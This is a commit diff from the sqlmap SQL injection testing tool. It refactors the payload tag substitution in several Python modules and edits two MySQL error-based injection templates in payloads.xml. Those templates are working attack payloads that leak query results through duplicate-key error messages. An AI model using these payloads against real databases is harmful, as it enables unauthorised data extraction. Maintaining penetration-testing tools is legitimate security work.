Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 2538e2d

Browse files
stamparmstamparm
committed
fixing an issue with --file-read and ROW() MySQL payload (it's internal caching mechanism prevents error message if FROM part is not unique enough dumping only partial file content); minor refactoring
1 parent 2c057d5 commit 2538e2d

6 files changed

Lines changed: 20 additions & 21 deletions

File tree

lib/controller/checks.py

Lines changed: 0 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -488,9 +488,6 @@ def genCmpPayload():
488488
if vector is None and "vector" in test and test.vector is not None:
489489
vector = "%s%s" % (test.vector, comment or "")
490490

491-
if method == PAYLOAD.METHOD.TIME:
492-
reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload)
493-
494491
injection.data[stype] = AttribDict()
495492
injection.data[stype].title = title
496493
injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)

lib/controller/controller.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -138,7 +138,7 @@ def __formatInjection(inj):
138138
title = title.replace("columns", "column")
139139
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
140140
data += " Title: %s\n" % title
141-
data += " Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec)))
141+
data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
142142
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
143143

144144
return data

lib/core/agent.py

Lines changed: 13 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -212,20 +212,19 @@ def cleanupPayload(self, payload, origValue=None):
212212
if payload is None:
213213
return
214214

215-
randInt = randomInt()
216-
randInt1 = randomInt()
217-
randInt2 = randomInt()
218-
randStr = randomStr()
219-
randStr1 = randomStr()
220-
221215
_ = (
222-
("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\
223-
("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
216+
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
224217
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
225218
("[HASH_REPLACE]", kb.chars.hash_)
226219
)
227220
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
228221

222+
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
223+
payload = payload.replace(_, str(randomInt()))
224+
225+
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
226+
payload = payload.replace(_, randomStr())
227+
229228
if origValue is not None:
230229
payload = payload.replace("[ORIGVALUE]", origValue)
231230

@@ -249,12 +248,15 @@ def cleanupPayload(self, payload, origValue=None):
249248

250249
return payload
251250

252-
def adjustSleepTime(self, payload):
251+
def adjustLateValues(self, payload):
253252
"""
254-
Returns payload with a replaced tag for SLEEPTIME
253+
Returns payload with a replaced late tags (e.g. SLEEPTIME)
255254
"""
256255

257-
return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload
256+
if payload:
257+
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
258+
259+
return payload
258260

259261
def getComment(self, request):
260262
"""

lib/request/connect.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -540,7 +540,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent
540540

541541
raise404 = place != PLACE.URI if raise404 is None else raise404
542542

543-
value = agent.adjustSleepTime(value)
543+
value = agent.adjustLateValues(value)
544544
payload = agent.extractPayload(value)
545545
threadData = getCurrentThreadData()
546546

lib/request/direct.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@
2828
def direct(query, content=True):
2929
select = True
3030
query = agent.payloadDirect(query)
31-
query = agent.adjustSleepTime(query)
31+
query = agent.adjustLateValues(query)
3232
threadData = getCurrentThreadData()
3333

3434
if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:

xml/payloads.xml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1215,9 +1215,9 @@ Formats:
12151215
<risk>0</risk>
12161216
<clause>1</clause>
12171217
<where>1</where>
1218-
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
1218+
<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
12191219
<request>
1220-
<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
1220+
<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
12211221
</request>
12221222
<response>
12231223
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1433,9 +1433,9 @@ Formats:
14331433
<risk>2</risk>
14341434
<clause>1</clause>
14351435
<where>2</where>
1436-
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</vector>
1436+
<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</vector>
14371437
<request>
1438-
<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)</payload>
1438+
<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)</payload>
14391439
</request>
14401440
<response>
14411441
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

0 commit comments

Comments
 (0)